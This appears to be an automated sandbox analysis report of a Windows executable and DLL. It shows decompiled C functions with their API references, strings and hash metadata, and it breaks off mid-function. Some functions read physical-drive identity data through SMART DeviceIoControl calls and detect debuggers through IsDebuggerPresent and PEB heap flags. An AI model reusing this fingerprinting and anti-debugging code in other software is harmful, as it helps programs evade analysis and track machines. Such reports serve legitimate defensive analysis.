0x004094af
0x00000000
0x00000000
0x004094b1
0x004094b4
0x00000000
0x00000000
0x00000000
0x004094b4
0x00409496
0x00409499
0x00000000
0x00000000
0x00000000
0x00000000
0x004094e5
0x004094e8
0x004094f3
0x004094f3
0x004094f9
0x00409458
0x00409458
0x00000000
0x00409458
0x004094ff
0x00409502
0x00000000
0x00000000
0x00409508
0x00409508
0x00000000
0x00409508
0x004094ea
0x004094ed
0x00409449
0x00409449
0x00000000
0x00409449
0x00000000
0x00000000
0x0040950f
0x00409512
0x00409512
0x00409518
0x0040952b
0x00409531
0x00409537
0x00409537
0x0040951a
0x0040951a
0x0040951f
0x00409524
0x00409525
0x00409526
0x00409528
0x00409528
0x00409539
0x0040953b
0x00000000
0x00000000
0x0040953d
0x00409541
0x00409553
0x00409553
0x00409553
0x00409543
0x00409543
0x00409546
0x00409549
0x0040954c
0x0040954f
0x0040954f
0x00409556
0x00409558
0x00409558
0x0040955b
0x00409561
0x00000000
0x00000000
0x00409563
0x00409563
0x00000000
0x00000000
0x0040956a
0x0040956e
0x00409571
0x00409574
0x00409583
0x00409583
0x00409583
0x00409589
0x0040959c
0x004095a2
0x004095a8
0x004095a8
0x0040958b
0x0040958b
0x00409590
0x00409595
0x00409596
0x00409597
0x00409599
0x00409599
0x004095aa
0x004095ac
0x00000000
0x00000000
0x004095ae
0x004095b2
0x004095b4
0x004095b7
0x004095ba
0x004095bd
0x004095c0
0x004095c0
0x004095c0
0x004095c3
0x004095c3
0x004095c5
0x004095c7
0x004095c7
0x004095ca
0x004095ca
0x004095cd
0x004094dd
0x004094dd
0x004094de
0x00000000
0x004094de
0x004095d3
0x004095d6
0x00000000
0x00000000
0x004094b6
0x004094b6
0x004094b9
0x00000000
0x00000000
0x004094bf
0x004094c2
0x004094d6
0x004094d6
0x00000000
0x004094d6
0x004094c4
0x004094c7
0x00000000
0x00000000
0x004094cd
0x004094d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00409576
0x00409576
0x00409576
0x00409579
0x00000000
0x00000000
0x0040957b
0x0040957e
0x00409580
0x00409580
0x00000000
0x00000000
0x004095e1
0x004095e7
0x004095ea
0x004095fd
0x00409603
0x00409609
0x00409609
0x004095ec
0x004095ec
0x004095f1
0x004095f6
0x004095f7
0x004095f8
0x004095fa
0x004095fa
0x0040960b
0x0040960d
0x00000000
0x00409613
0x00409613
0x00000000
0x00409613
0x00000000
0x00409617
0x00409617
0x0040961a
0x0040961d
0x00409620
0x00409627
0x00409627
0x0040962a
0x0040962a
0x0040962d
0x00000000
0x00000000
0x0040962f
0x00409630
0x00409630
0x00409631
0x00000000
0x00000000
0x00409633
0x00409633
0x00409636
0x00000000
0x00000000
0x00000000
0x00409636
0x00409622
0x00409625
0x00000000
0x00000000
0x00000000
0x00000000
0x00409661
0x00409664
0x00409674
0x00409674
0x00409677
0x004096bd
0x004096bd
0x00000000
0x004096bd
0x0040963c
0x0040963c
0x00000000
0x0040963c
0x00409666
0x00409669
0x00000000
0x00000000
0x00000000
0x00000000
0x00409640
0x00409643
0x00409643
0x00409646
0x00000000
0x00000000
0x00409648
0x0040964a
0x0040964a
0x0040964d
0x00409650
0x00000000
0x00000000
0x00409656
0x00409659
0x00000000
0x00000000
0x0040966b
0x0040966b
0x0040966d
0x0040966d
0x0040966e
0x0040966e
0x00000000
0x00000000
0x004096c5
0x004096cc
0x004096cc
0x004096ce
0x004096ce
0x004096d5
0x004096e6
0x004096ec
0x004096f2
0x004096f2
0x004096d7
0x004096d7
0x004096dd
0x004096e2
0x004096e3
0x004096e3
0x004096f5
0x004096f7
0x00000000
0x00000000
0x004096f9
0x004096ff
0x004096ff
0x00409703
0x00409709
0x00409710
0x00000000
0x00409710
0x0040970b
0x0040970d
0x0040970d
0x00409715
0x00409718
0x00409718
0x0040971f
0x00409730
0x00409736
0x0040973c
0x0040973c
0x00409721
0x00409721
0x00409727
0x0040972c
0x0040972d
0x0040972d
0x0040973f
0x00409741
0x00000000
0x00000000
0x00409743
0x00409745
0x00409745
0x00409748
0x00409748
0x00000000
0x00000000
0x00000000
0x00000000
0x0040967b
0x0040967f
0x004096ab
0x004096ad
0x004096ad
0x004096ae
0x00000000
0x004096ae
0x00409681
0x00409684
0x00409684
0x00409687
0x00409687
0x0040968a
0x0040968d
0x004096a3
0x004096a3
0x004096a5
0x004096a5
0x00000000
0x004096a5
0x0040968f
0x00409690
0x00409690
0x00409691
0x0040974b
0x0040974b
0x0040974d
0x00409750
0x00409754
0x00409756
0x00409835
0x00409837
0x00409839
0x0040983b
0x0040983d
0x0040985b
0x0040985b
0x0040985e
0x0040985e
0x00409862
0x00409865
0x00409868
0x00409870
0x00409875
0x00409875
0x0040975c
0x0040975e
0x0040975f
0x00409762
0x00409779
0x00409764
0x00409764
0x00409768
0x0040976a
0x0040976a
0x0040976a
0x0040976a
0x0040976d
0x00409773
0x00409774
0x00409774
0x0040977c
0x00409780
0x0040982b
0x0040982d
0x0040982f
0x00409831
0x00000000
0x00409786
0x00409786
0x00409786
0x00409787
0x0040978a
0x00000000
0x00000000
0x0040978c
0x0040978f
0x0040978f
0x0040979f
0x004097a4
0x004097ac
0x004097af
0x004097b1
0x004097b1
0x004097b3
0x004097b6
0x004097b9
0x004097bb
0x004097bb
0x004097bb
0x004097be
0x004097c1
0x004097c3
0x004097c3
0x004097c3
0x004097c6
0x004097cb
0x004097fd
0x00409802
0x00409815
0x0040981a
0x0040981d
0x00409820
0x00409823
0x00000000
0x00409826
0x00409804
0x00000000
0x004097cd
0x004097cd
0x004097d4
0x004097d4
0x004097d7
0x004097da
0x004097dd
0x004097e0
0x004097e0
0x004097e4
0x00409846
0x0040984a
0x0040984c
0x0040984e
0x00409850
0x00409852
0x00409852
0x00409854
0x00409854
0x004097e6
0x004097e6
0x004097e8
0x004097ed
0x004097f2
0x004097f4
0x004097f4
0x00000000
0x004097e4
0x004097cb
0x00409780
0x00409697
0x00409697
0x0040969b
0x0040969d
0x00000000
0x00000000
0x00409438
0x004096af
0x004096b2
0x00000000
0x00000000
0x00000000

Strings

9, xrefs: 00409656
0, xrefs: 00409643
c, xrefs: 004094C4
0, xrefs: 00409674
-, xrefs: 004095D3
9, xrefs: 00409666
0, xrefs: 004094B1
9, xrefs: 00409444
1, xrefs: 0040964D
0, xrefs: 004094FF
9, xrefs: 00409622
9, xrefs: 00409496
E, xrefs: 004094BF
9, xrefs: 004094EA
+, xrefs: 004094A7
C, xrefs: 004094B6
-, xrefs: 004094AC
e, xrefs: 004094CD
0, xrefs: 00409576
+, xrefs: 004095CA
1, xrefs: 0040961A

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
API String ID: 0-1157002505
Opcode ID: b8cf473db7cb9297b07d1d54a8ff804f5d83ba8f2f9f50276f654a47c6e1c30e
Instruction ID: d9c4bdcfbf6ac4d29bf3bf58d3038f237c571d90b969de57a998632f55ae988e
Opcode Fuzzy Hash: b8cf473db7cb9297b07d1d54a8ff804f5d83ba8f2f9f50276f654a47c6e1c30e
Instruction Fuzzy Hash: C7E1CD32D69209DEEB258E65C9457EE7BB1AB44304F28443BD401B62C3D77D8D82CB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00408D68, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00408D68(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x4109f8 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x4109fc; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x410a00; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x4109f8(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x4109f8 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x4109fc = GetProcAddress(_t15, "GetActiveWindow");
					 *0x410a00 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x00408d69
0x00408d6b
0x00408d73
0x00408db7
0x00408db7
0x00408dbe
0x00408dc2
0x00408dc6
0x00408dc8
0x00408dcf
0x00408dd4
0x00408dd4
0x00408dcf
0x00408dc6
0x00000000
0x00408de3
0x00408d80
0x00408d84
0x00408ded
0x00000000
0x00408ded
0x00408d92
0x00408d96
0x00408d9b
0x00000000
0x00408d9d
0x00408dab
0x00408db2
0x00000000
0x00408db2

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00406D84,?,Microsoft Visual C++ Runtime Library,00012010,?,0040B658,?,0040B6A8,?,?,?,Runtime Error!Program: ), ref: 00408D7A
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00408D92
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00408DA3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00408DB0

Strings

GetLastActivePopup, xrefs: 00408DA5
GetActiveWindow, xrefs: 00408D9D
user32.dll, xrefs: 00408D75
MessageBoxA, xrefs: 00408D8C

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: f7850f07079205152cae9b16221561117037284cbd462a1dac085e368bad08e9
Instruction ID: 95536b36c0a73afdfafba42784b12344ea0077410b62820a9f877c3a80c8d56d
Opcode Fuzzy Hash: f7850f07079205152cae9b16221561117037284cbd462a1dac085e368bad08e9
Instruction Fuzzy Hash: 770175B1641316ABD7509FB55D80E973ED8EEA4790710453EF151F22E1DFB8C8409BAC

Uniqueness

Uniqueness Score: -1.00%

Function 1001D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1001D3D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CEAF(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA40(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CDD0( &_v1564);
							_t76 = E1001D000(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}

0x1001d3d0
0x1001d3d0
0x1001d3d0
0x1001d3d9
0x1001d3e3
0x1001d3e6
0x1001d3f0
0x1001d3fa
0x1001d40a
0x1001d410
0x1001d42f
0x1001d436
0x1001d43d
0x1001d447
0x1001d451
0x1001d45b
0x1001d465
0x1001d46f
0x1001d479
0x1001d4a2
0x1001d4a8
0x1001d4aa
0x1001d4b6
0x1001d4bb
0x1001d4be
0x1001d4c4
0x1001d4c8
0x1001d4f9
0x1001d4fb
0x1001d566
0x1001d56a
0x1001d573
0x1001d574
0x1001d579
0x1001d57c
0x1001d583
0x1001d58d
0x00000000
0x1001d58d
0x00000000
0x1001d585
0x1001d4fd
0x1001d504
0x1001d512
0x1001d51f
0x1001d522
0x1001d522
0x1001d53a
0x1001d550
0x1001d555
0x1001d558
0x1001d55a
0x1001d55c
0x1001d55c
0x00000000
0x1001d55a
0x00000000
0x1001d4ac
0x1001d590
0x1001d596
0x1001d59c
0x1001d5a2
0x1001d5b5

APIs

wsprintfW.USER32 ref: 1001D40A
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D429
DeviceIoControl.KERNEL32 ref: 1001D4A2

Strings

\\.\PhysicalDrive%d, xrefs: 1001D3FE

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ControlCreateDeviceFilewsprintf
String ID: \\.\PhysicalDrive%d
API String ID: 3081802084-2935326385
Opcode ID: de9a76d0024823a394fdd4108f71e87b0028d34ecfefb80d4632e3eaefcbe126
Instruction ID: f26b544c4fccea81e18431b955f202ed2237751288ed87d0487abbb64b72177a
Opcode Fuzzy Hash: de9a76d0024823a394fdd4108f71e87b0028d34ecfefb80d4632e3eaefcbe126
Instruction Fuzzy Hash: 38512EB4D00218EFEB10DF94CC85BDEB7B5EB84704F104599E509AB280D7B6AB94CF95

Uniqueness

Uniqueness Score: -1.00%

Function 1000F05C, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1000F05C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103342d8; // 0xc99403a3
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10335a58 = _t6;
				 *0x10335a54 = _t22;
				 *0x10335a50 = _t25;
				 *0x10335a4c = _t21;
				 *0x10335a48 = _t27;
				 *0x10335a44 = _t26;
				 *0x10335a70 = ss;
				 *0x10335a64 = cs;
				 *0x10335a40 = ds;
				 *0x10335a3c = es;
				 *0x10335a38 = fs;
				 *0x10335a34 = gs;
				asm("pushfd");
				_pop( *0x10335a68);
				 *0x10335a5c =  *_t31;
				 *0x10335a60 = _v0;
				 *0x10335a6c =  &_a4;
				 *0x103359a8 = 0x10001;
				_t11 =  *0x10335a60; // 0x0
				 *0x1033595c = _t11;
				 *0x10335950 = 0xc0000409;
				 *0x10335954 = 1;
				_t12 =  *0x103342d8; // 0xc99403a3
				_v812 = _t12;
				_t13 =  *0x103342dc; // 0x366bfc5c
				_v808 = _t13;
				 *0x103359a0 = IsDebuggerPresent();
				_push(1);
				E10013ABF(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10024b30);
				if( *0x103359a0 == 0) {
					_push(1);
					E10013ABF(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x1000f05c
0x1000f05c
0x1000f05c
0x1000f05c
0x1000f05c
0x1000f05c
0x1000f05c
0x1000f062
0x1000f064
0x1000f064
0x10016175
0x1001617a
0x10016180
0x10016186
0x1001618c
0x10016192
0x10016198
0x1001619f
0x100161a6
0x100161ad
0x100161b4
0x100161bb
0x100161c2
0x100161c3
0x100161cc
0x100161d4
0x100161dc
0x100161e7
0x100161f1
0x100161f6
0x100161fb
0x10016205
0x1001620f
0x10016214
0x1001621a
0x1001621f
0x1001622b
0x10016230
0x10016232
0x1001623a
0x10016245
0x10016252
0x10016254
0x10016256
0x1001625b
0x1001626f

APIs

IsDebuggerPresent.KERNEL32 ref: 10016225
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001623A
UnhandledExceptionFilter.KERNEL32(10024B30), ref: 10016245
GetCurrentProcess.KERNEL32(C0000409), ref: 10016261
TerminateProcess.KERNEL32(00000000), ref: 10016268

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
Instruction ID: ee8eee148a0b36da5bac1509a6259723a028944e4d48fabcbe23e45d6083a592
Opcode Fuzzy Hash: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
Instruction Fuzzy Hash: 7B21D2B8802224DFD702DF65DCC46453BBCFB88315F915619E90D8EBA2EB709985EF05

Uniqueness

Uniqueness Score: -1.00%

Function 100197E0, Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E100197E0(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44);
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CEAF(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF80(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0);
					_v8 = 1;
				}
				return _v8;
			}

0x100197e6
0x100197ed
0x1001980c
0x1001981b
0x1001982e
0x1001983e
0x10019864
0x1001986a
0x1001986a
0x10019877

APIs

SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
GetLastError.KERNEL32 ref: 10019812
_memset.LIBCMT ref: 1001983E
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: DevicePropertyRegistrySetup$ErrorLast_memset
String ID:
API String ID: 895502402-0
Opcode ID: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
Instruction ID: 24f19bb5529a22c6d1e928f7077b1b8c164a3afe4c2a2c0ecea0b5371702a92b
Opcode Fuzzy Hash: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
Instruction Fuzzy Hash: EA11C6B9610208ABDB04CF94C8D5FDA77B9AB48304F118259F9099B280DA31EA85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00401000() {
				void* _v152;
				struct _OSVERSIONINFOA _v156;
				int _t13;

				memset( &_v156, 0, 0x27 << 2);
				_v156.dwOSVersionInfoSize = 0x9c;
				_t13 = GetVersionExA( &_v156);
				if(_t13 != 0) {
					L4:
					asm("sbb eax, eax");
					return _t13 + 1;
				} else {
					_v156.dwOSVersionInfoSize = 0x9c;
					_t13 = GetVersionExA( &_v156);
					if(_t13 != 0) {
						goto L4;
					} else {
						_v156.dwOSVersionInfoSize = 0x94;
						_t13 = GetVersionExA( &_v156);
						if(_t13 != 0) {
							goto L4;
						} else {
							return _t13;
						}
					}
				}
			}

0x00401019
0x00401025
0x00401029
0x0040102d
0x0040105a
0x00401063
0x0040106c
0x0040102f
0x00401033
0x00401038
0x0040103c
0x00000000
0x0040103e
0x00401042
0x0040104b
0x0040104f
0x00000000
0x00401059
0x00401059
0x00401059
0x0040104f
0x0040103c

APIs

GetVersionExA.KERNEL32(?), ref: 00401029
GetVersionExA.KERNEL32(?), ref: 00401038
GetVersionExA.KERNEL32(?), ref: 0040104B

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 710451c45f8dfd25da9ecc52a2db16fffe487da5b37058df93ff72893883cd8c
Instruction ID: 643cff9135a756f24650b46ce0448332fbe4b8e7e2291f0d1fd909cc2a13ae58
Opcode Fuzzy Hash: 710451c45f8dfd25da9ecc52a2db16fffe487da5b37058df93ff72893883cd8c
Instruction Fuzzy Hash: B3F06835A04301E6E710DB24DC40FAB7FE9ABC4350F40C93AE88D93261E37CD4854A92

Uniqueness

Uniqueness Score: -1.00%

Function 100153D6, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E100153D6(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E1001158A());
				 *0x10335948 = 0;
				return _t8;
			}

0x100153db
0x100153eb
0x100153f1
0x100153f8

APIs

__decode_pointer.LIBCMT ref: 100153E4

Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331640), ref: 10011597
Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100153EB

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: 8a9a1afd20679182302b8bb126efabb9badc4dbb18d80dbba4be7448194c4791
Instruction ID: b8b51d76abf1898de47abb934c9bf902fc70bf371f14314f3375d114c8e601f7
Opcode Fuzzy Hash: 8a9a1afd20679182302b8bb126efabb9badc4dbb18d80dbba4be7448194c4791
Instruction Fuzzy Hash: B7C04CD9418391CED755D77448CE35D7A58A792133FA504C9D4858D1D3DE6498C48621

Uniqueness

Uniqueness Score: -1.00%

Function 10019E70, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019E70() {
				long _v8;
				signed int _v12;
				intOrPtr _v16;

				_v16 = 0;
				_v8 = GetVersion();
				_v12 = _v8 & 0xff;
				if(_v12 != 5) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x40));
				} else {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0xc));
				}
				return 0 | _v16 != 0x00000002;
			}

0x10019e76
0x10019e83
0x10019e9a
0x10019ea1
0x10019ec0
0x10019ea3
0x10019eaf
0x10019eaf
0x10019ecf

APIs

GetVersion.KERNEL32 ref: 10019E7D

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b14fa37dc0eb6ed79670f955555dfb94b709b47d9fb1d0cae81dbeb96f8b885b
Instruction ID: 4018ca53e831ca463c33f4294bbf5297299f902e57f907431d81eadbc7e7513d
Opcode Fuzzy Hash: b14fa37dc0eb6ed79670f955555dfb94b709b47d9fb1d0cae81dbeb96f8b885b
Instruction Fuzzy Hash: 5EF0627AE04259EFCB10CFA8C485AACBBF0FB08310F0180B9E8029B710D2389A80DF50

Uniqueness

Uniqueness Score: -1.00%

Function 10019ED0, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019ED0() {
				long _v8;
				signed int _v12;
				intOrPtr _v16;

				_v16 = 0;
				_v8 = GetVersion();
				_v12 = _v8 & 0xff;
				if(_v12 != 5) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x44));
				} else {
